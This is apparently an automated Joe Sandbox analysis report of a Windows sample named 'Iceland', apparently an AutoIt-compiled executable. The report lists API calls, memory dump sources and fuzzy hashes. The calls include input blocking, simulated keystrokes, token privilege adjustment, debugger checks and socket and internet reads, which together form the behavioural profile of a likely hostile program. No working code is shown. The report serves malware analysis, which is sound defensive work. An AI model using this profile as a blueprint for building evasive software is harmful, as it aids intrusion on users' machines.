                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5BD78
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5BEFF
                                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00AC46D0), ref: 00A5BF11
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00AF221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A5BF89
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00AF2270,000000FF,?,0000003F,00000000,?), ref: 00A5BFB6
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5C0CB
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A656C2,?,?,00000000,00000000), ref: 00A93A1E
                                                                                                                                                                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A656C2,?,?,00000000,00000000), ref: 00A93A35
                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,00A656C2,?,?,00000000,00000000,?,?,?,?,?,?,00A266CE), ref: 00A93A45
                                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,00A656C2,?,?,00000000,00000000,?,?,?,?,?,?,00A266CE), ref: 00A93A56
                                                                                                                                                                                                                                                                • LockResource.KERNEL32(00A656C2,?,?,00A656C2,?,?,00000000,00000000,?,?,?,?,?,?,00A266CE,?), ref: 00A93A65
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                • String ID: SCRIPT
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A81916
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A81922
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A81931
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A81938
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A8194E
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000000,00A81C81), ref: 00A820FB
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A82107
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A8210E
                                                                                                                                                                                                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 00A82127
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00A81C81), ref: 00A8213B
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A82142
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00A9A5BD
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00A9A6D0
                                                                                                                                                                                                                                                                  • Part of subcall function 00A942B9: GetInputState.USER32 ref: 00A94310
                                                                                                                                                                                                                                                                  • Part of subcall function 00A942B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A943AB
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00A9A5ED
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00A9A6BA
                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,?), ref: 00A2233E
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00A22421
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 00A22434
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$Proc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 929743424-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00AA3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AA3AD7
                                                                                                                                                                                                                                                                  • Part of subcall function 00AA3AAB: _wcslen.LIBCMT ref: 00AA3AF8
                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00AA22BA
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA22E1
                                                                                                                                                                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00AA2338
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA2343
                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AA2372
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                APIs
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 292994002-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00A9D8CE
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 00A9D92F
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 00A9D943
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 234945975-0
                                                                                                                                                                                                                                                                • Opcode ID: e2abcc2650309b81b8f8a678f85580b231484887d13334d5871eacb4cbc152d8
                                                                                                                                                                                                                                                                • Instruction ID: 9d3272793037eacf7aebc64888994b0c31bfee864707c5083a4cd4f2de93050d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2abcc2650309b81b8f8a678f85580b231484887d13334d5871eacb4cbc152d8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC21AF75600705EFEB30EFA6C988BAAB7FCEB41314F10442DE64692552E774EA85CB90
APIs
• lstrlenW.KERNEL32(?,00A646AC), ref: 00A8E482
• GetFileAttributesW.KERNEL32(?), ref: 00A8E491
• FindFirstFileW.KERNEL32(?,?), ref: 00A8E4A2
• FindClose.KERNEL32(00000000), ref: 00A8E4AE
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstlstrlen
• String ID:
• API String ID: 2695905019-0
• Opcode ID: 953049c3ac92f2b55315baa37c94963a20e33c465c94fea461d5e3610fd194ad
• Instruction ID: 82983eddba4f4632a6da7950004ebab1f572da93eb91ac6982ab73b794bb5ac6
• Opcode Fuzzy Hash: 953049c3ac92f2b55315baa37c94963a20e33c465c94fea461d5e3610fd194ad
• Instruction Fuzzy Hash: F8F0A030410910979314F7BCAC0D8AA766DAE82335B504701F83AC20F0F7BA99968695
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
• Opcode ID: ec7257e3687e71d5a8149b03dd99fd1768ffdcdf6864e815b4ab8e186f8b80d5
• Instruction ID: 100d9fb2d95483c5c7f06185ddab2b0310be62cd6def842c2535cfd8300b3a4f
• Opcode Fuzzy Hash: ec7257e3687e71d5a8149b03dd99fd1768ffdcdf6864e815b4ab8e186f8b80d5
• Instruction Fuzzy Hash: 2BD062B1C04159EACBD4D6909D49DB973BCBB1C700F64C9A6F90AD1051F63499549721
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00A52A8A
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00A52A94
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00A52AA1
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 9905c525a512b02e50a3b88ccf7e89350af18e7820f760d51ebf987e5e606644
• Instruction ID: 99e9bcd78f37de28aedbcbd833e601e028f0a1ede9465fc6b2d1b80074f828a5
• Opcode Fuzzy Hash: 9905c525a512b02e50a3b88ccf7e89350af18e7820f760d51ebf987e5e606644
• Instruction Fuzzy Hash: AC31B3759012289BCB21DF68DD89BDDBBB8BF48311F5042DAE90CA6261E7309F858F45
APIs
  • Part of subcall function 00A4014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00A409D8
  • Part of subcall function 00A4014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00A409F5
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A8205A
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A82087
• GetLastError.KERNEL32 ref: 00A82097
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 577356006-0
• Opcode ID: 2713e211cabdfae5d96f4adf51584e27d63a340394cd5a414bf86505c2a6977b
• Instruction ID: 9415481a9307775b0a2a349c35d0fe36ee3f3b4f79d3ecdaa194ec6612edb1d0
• Opcode Fuzzy Hash: 2713e211cabdfae5d96f4adf51584e27d63a340394cd5a414bf86505c2a6977b
• Instruction Fuzzy Hash: 3111BFB1400204AFD718AF54DC86E6BB7B8FB44710B20852EE44657251EB70BC42CB20
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,00A4502E,?,00AE98D8,0000000C,00A45185,?,00000002,00000000), ref: 00A45079
                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00A4502E,?,00AE98D8,0000000C,00A45185,?,00000002,00000000), ref: 00A45080
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00A45092
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                • Opcode ID: 8b99fb62b788cdc058ca57307a69720aa7d0508330b96391979551af599f4981
                                                                                                                                                                                                                                                                • Instruction ID: cf1302d7bb78a06ffe2f4e929044759aa751ef1b7909f5696371461d358c0f62
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b99fb62b788cdc058ca57307a69720aa7d0508330b96391979551af599f4981
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAE0B63A400548AFCF21AFA4DE09E583BA9EB91385F154514F8499A533EB35DD42CBD0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 00A7E664
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: NameUser
                                                                                                                                                                                                                                                                • String ID: X64
                                                                                                                                                                                                                                                                • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                • Opcode ID: 7d9388aa464675236acfe7f76c5da990091af2366f64e6ba51da1554bd33ab80
                                                                                                                                                                                                                                                                • Instruction ID: 0e802d49b660679d4f595f88232f86560337f664f79fb5be9f8530f067883ba4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d9388aa464675236acfe7f76c5da990091af2366f64e6ba51da1554bd33ab80
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CD0C9B480111DEACB80DB90EC88DDA73BCBB08304F104691F106E2041D73095498B10
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00AA52EE,?,?,00000035,?), ref: 00A94229
                                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00AA52EE,?,?,00000035,?), ref: 00A94239
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                • Opcode ID: 0ca360a49f60f5c8c9baf4557089ccfa9e1de6fdfbc745a663f912daff46219e
                                                                                                                                                                                                                                                                • Instruction ID: 464266f617c7b88fea1d8a55e27bfc2e81a7ac4a50bf5c3830b1325edf8d84ac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ca360a49f60f5c8c9baf4557089ccfa9e1de6fdfbc745a663f912daff46219e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82F0A0307002256AEB2057A5AC4DFEB3AADFF89B61F000275F505D2192DA70990187B0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00A8BC24
                                                                                                                                                                                                                                                                • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00A8BC37
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                • Opcode ID: 1af318aad3ada99795b475ba1247fefe1e34e544a518fdedba77bd4804e0a06a
                                                                                                                                                                                                                                                                • Instruction ID: 6ae08abc54700ab39fc3e59328e078a5e590c60ebc0752b9eba33d4d3feeae91
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1af318aad3ada99795b475ba1247fefe1e34e544a518fdedba77bd4804e0a06a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27F06D7080024DABDB01DFA0C805BFE7BB0FF08309F008419F951A51A2D7798201DFA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A81B48), ref: 00A81A20
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00A81B48), ref: 00A81A35
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 81990902-0
                                                                                                                                                                                                                                                                • Opcode ID: 3964c821dacc598b2aa1d0123f192a89415fadf3a7723b2423ef0628852308fb
                                                                                                                                                                                                                                                                • Instruction ID: 30502feb305c8162f7ce816d6b8fcdd9f099641c876034cfed8f32b530d196f5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3964c821dacc598b2aa1d0123f192a89415fadf3a7723b2423ef0628852308fb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CE01A72004610AEE7252B54EC05E72B7A9EB04320F148A2DB59680471EB726C91EB10
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • BlockInput.USER32(00000001), ref: 00A9F51A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BlockInput
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                • Opcode ID: 2599f370a2fa3aec189ecbca3d0c49fc33c253509cd3ff74ada5e1a4dbe1d6d3
                                                                                                                                                                                                                                                                • Instruction ID: 8607c90803a7efcc0d6b37d68df1a216910a683e92432c91d0eba9c2ee76ad07
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2599f370a2fa3aec189ecbca3d0c49fc33c253509cd3ff74ada5e1a4dbe1d6d3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47E048313102145FCB10EF6DE44495AF7E8AFA4771F018425F84AC7351D670F9418B90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00A8ECC7
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: mouse_event
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2434400541-0
                                                                                                                                                                                                                                                                • Opcode ID: aecf13d0200e3f439cc7ffac58f2ca7f5a78136001a9d9f6f1d92ab4c812eeca
                                                                                                                                                                                                                                                                • Instruction ID: df99d8f2d97204bdd4fe19834379a8ec6c7734960437449f285420d2897efca8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aecf13d0200e3f439cc7ffac58f2ca7f5a78136001a9d9f6f1d92ab4c812eeca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0D05EF6998200F8EA2DFB398E2FB762509E781751F880749B202C96D9E5D19900A261
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00A4075E), ref: 00A40D4A
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                • Opcode ID: 0366da583d40008dd1984f283066b74cbd383d6c70ec744c7980b3d23c401f91
                                                                                                                                                                                                                                                                • Instruction ID: 93131beb3ba99f8da92ef253e0a1157372ea1131bae4a9c8f5b79678d1579313
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0366da583d40008dd1984f283066b74cbd383d6c70ec744c7980b3d23c401f91
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AA358D
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AA35A0
                                                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 00AA35AF
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00AA35CA
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AA35D1
                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00AA3700
                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00AA370E
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA3755
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00AA3761
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AA379D
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA37BF
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA37D2
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA37DD
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00AA37E6
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA37F5
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00AA37FE
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA3805
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00AA3810
